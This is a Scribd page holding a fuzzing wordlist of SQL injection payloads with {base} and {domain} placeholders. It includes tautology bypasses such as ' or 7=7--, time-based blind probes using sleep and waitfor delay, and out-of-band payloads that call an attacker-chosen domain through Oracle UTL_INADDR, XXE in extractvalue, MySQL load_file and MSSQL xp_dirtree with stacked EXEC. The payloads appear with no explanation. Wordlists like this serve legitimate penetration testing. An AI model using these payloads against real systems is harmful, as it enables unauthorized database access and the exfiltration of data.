Scribd
Upload
13 views

Fuzzing - SQL Injection

The document contains a comprehensive list of SQL injection techniques and payloads that can be used to exploit vulnerabilities in database systems. It includes various methods for bypassing security measures, extracting data, and executing commands on the database. The content is highly technical and aimed at individuals with knowledge of SQL and cybersecurity practices.

Uploaded by

kenjie.f.a.var.des.o
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
13 views

Fuzzing - SQL Injection

The document contains a comprehensive list of SQL injection techniques and payloads that can be used to exploit vulnerabilities in database systems. It includes various methods for bypassing security measures, extracting data, and executing commands on the database. The content is highly technical and aimed at individuals with knowledge of SQL and cybersecurity practices.

Uploaded by

kenjie.f.a.var.des.o
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 4

'

''
\
\\
\'
{base}-0
{base}*1
{base}'||'
{base}'+'
{base}' '
{base}'.'
{base}','
"
""
\"
{base}"||"
{base}"+"
{base}","
{base}/*_*/
{base}/*x*/
{base}|0
'{base}'
"{base}"
({base})
{base}'--
{base}')--
{base}');--
{base}'))--
{base}'));--
{base}')))--
{base}')));--
{base}'#
{base}')#
{base}');#
{base}'))#
{base}'));#
{base}')))#
{base}"#
{base}")#
{base}");#
' or 'z'='z
1 or 7=7
1 and 7=7
{base} or 7=7
{base} or 7=7--
{base} or 7=7#
{base} or 7=7)--
{base} or 7=7)#
{base}' or 7=7
{base}' or 7=7--
{base}' or 7=7#
{base}' or 'z'='z
{base}' or 'z'='z' or 'a'='b
{base}'/**/or/**/'z'='z
{base}' or username like '%
{base}' or id like '%
{base}' or user like '%
{base}' or @version like '%
{base}' or version() like '%
{base}') or ('x'='x
{base}')) or (('x'='x
{base}' and 7=7
{base}' and 7=7--
{base}' and 7=7#
{base}\' and 7=7--
{base}\' and 7=7#
" or "z"="z
{base}" or 7=7
{base}" or 7=7--
{base}" or 7=7#
{base}" or "z"="z
{base}" or "z"="z" or "a"="b
{base}"/**/or/**/"z"="z
{base}" or username like "%
{base}" or id like "%
{base}" or user like "%
{base}" or @version like "%
{base}" or version() like "%
{base}") or ("x"="x
{base}")) or (("x"="x
{base}" and 7=7
{base}\" and 7=7--
{base}\" and 7=7#
(select 1)
(select from dual)
(select {base})
`
*/
/*
-->
#>
%27
%22
%5c
ˤ
ħ
'
À¢
Ä¢
"
'
Ŝ
﹨
ï¼¼
{base}||UTL_INADDR.get_host_address('{domain}')
{base}'||UTL_INADDR.get_host_address('{domain}')||'
{base}||extractvalue(xmltype('<!DOCTYPE root [<!ENTITY % xxx SYSTEM
{base}"http://{domain}/ext1">%xxx;]>'),'/l')
{base}'||extractvalue(xmltype('<!DOCTYPE root [<!ENTITY % xxx SYSTEM
{base}"http://{domain}/ext2">%xxx;]>'),'/l')||'
UTL_INADDR.get_host_address(ORACLE_ENCODE_STRING({domain}))
{base} or chr(1)=UTL_INADDR.get_host_address(ORACLE_ENCODE_STRING({domain}))
extractvalue(xmltype(ORACLE_ENCODE_STRING(<!DOCTYPE root [<!ENTITY % xxx SYSTEM
"http://{domain}/ext3">%xxx;]>),ORACLE_ENCODE_STRING(/l))
{base} or chr(1)=extractvalue(xmltype(ORACLE_ENCODE_STRING(<!DOCTYPE root [<!ENTITY
% xxx SYSTEM "http://{domain}/ext4">%xxx;]>),ORACLE_ENCODE_STRING(/l))
(select load_file('\\\\{domain}\\c'))
{base}'+(select load_file('\\\\{domain}\\e'))+'
{base};EXEC master..xp_dirtree '\\{domain}\s'--
1;EXEC master..xp_dirtree '\\{domain}\s'--
{base}';EXEC master..xp_dirtree '\\{domain}\s'--
{base}'EXEC master..xp_dirtree '\\{domain}\s'--
{base}');EXEC master..xp_dirtree '\\{domain}\s'--
{base};EXEC master..xp_dirtree "\\{domain}\s"--
1;EXEC master..xp_dirtree "\\{domain}\s"--
{base}";EXEC master..xp_dirtree "\\{domain}\s"--
{base}");EXEC master..xp_dirtree "\\{domain}\s"--
{base}"='';EXEC master..xp_dirtree "\\{domain}\s"--
{base}"='');EXEC master..xp_dirtree "\\{domain}\s"--
{base};DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree
'\\{domain}\s');EXEC(@x)--
1;DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree '\\
{domain}\s');EXEC(@x)--
{base}';DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree
'\\{domain}\s');EXEC(@x)--
{base}');DECLARE @x AS VARCHAR(255);select
@x=MSSQL_ENCODE_STRING(master..xp_dirtree '\\{domain}\s');EXEC(@x)--
{base}";DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree
'\\{domain}\s');EXEC(@x)--
{base}");DECLARE @x AS VARCHAR(255);select
@x=MSSQL_ENCODE_STRING(master..xp_dirtree '\\{domain}\s');EXEC(@x)--
{base}"='';DECLARE @x AS VARCHAR(255);select
@x=MSSQL_ENCODE_STRING(master..xp_dirtree '\\{domain}\s');EXEC(@x)--
{base}"='');DECLARE @x AS VARCHAR(255);select
@x=MSSQL_ENCODE_STRING(master..xp_dirtree '\\{domain}\s');EXEC(@x)--
{base}\';DECLARE @x AS VARCHAR(255);select
@x=MSSQL_ENCODE_STRING(master..xp_dirtree '\\{domain}\s');EXEC(@x)--
{base}\";DECLARE @x AS VARCHAR(255);select
@x=MSSQL_ENCODE_STRING(master..xp_dirtree '\\{domain}\s');EXEC(@x)--
{base}' waitfor delay '0:0:20'--
{base} waitfor delay '0:0:20'--
',0)waitfor delay'0:0:20'--
{base}'(select*from(select(sleep(20)))a)'
{base}' (select*from(select(sleep(20)))a) '
{base}' and (select*from(select(sleep(20)))a)--
{base},(select*from(select(sleep(20)))a)
@@version
{base},@@version
version()
{base},version()
select
insert
as
or
procedure
limit
order by
asc
desc
delete
update
distinct
having
truncate
replace
like
handler
bfilename
to_timestamp_tz
tz_offset

You might also like